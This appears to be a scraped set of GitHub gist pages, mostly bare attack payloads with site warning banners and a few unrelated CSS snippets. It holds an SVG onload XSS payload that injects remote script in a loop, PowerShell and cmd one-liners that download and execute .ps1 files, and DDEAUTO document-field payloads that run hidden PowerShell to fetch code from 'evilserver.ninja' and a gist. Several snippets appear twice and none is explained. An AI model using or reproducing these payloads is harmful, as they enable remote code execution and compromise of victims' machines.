This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); | |
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); " | |
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* The first commented line is your dabblet’s title | |
*/ | |
background: #f06; | |
background: linear-gradient(45deg, #f06, yellow); | |
min-height: 100%; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); | |
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); " | |
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* The first commented line is your dabblet’s title | |
*/ | |
background: #f06; | |
background: linear-gradient(45deg, #f06, yellow); | |
min-height: 100%; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Client = New-Object -TypeName System.Net.WebClient | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials | |
$client.DownloadFile('https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298','C:\temp\local1.ps1') | |
$exec = New-Object -com shell.application | |
$exec.shellexecute('C:\temp\local1.ps1') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Client = New-Object -TypeName System.Net.WebClient | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials | |
$client.DownloadFile('https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298','C:\temp\local1.ps1') | |
$exec = New-Object -com shell.application | |
$exec.shellexecute('C:\temp\local1.ps1') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e " | |
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI | |
$Client = (new-object net.webclient); | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; | |
$client.DownloadFile("https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298","C:\temp\local1.ps1"); | |
$Client = New-Object -TypeName System.Net.WebClient | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e " | |
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI | |
$Client = (new-object net.webclient); | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; | |
$client.DownloadFile("https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298","C:\temp\local1.ps1"); | |
$Client = New-Object -TypeName System.Net.WebClient | |
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials |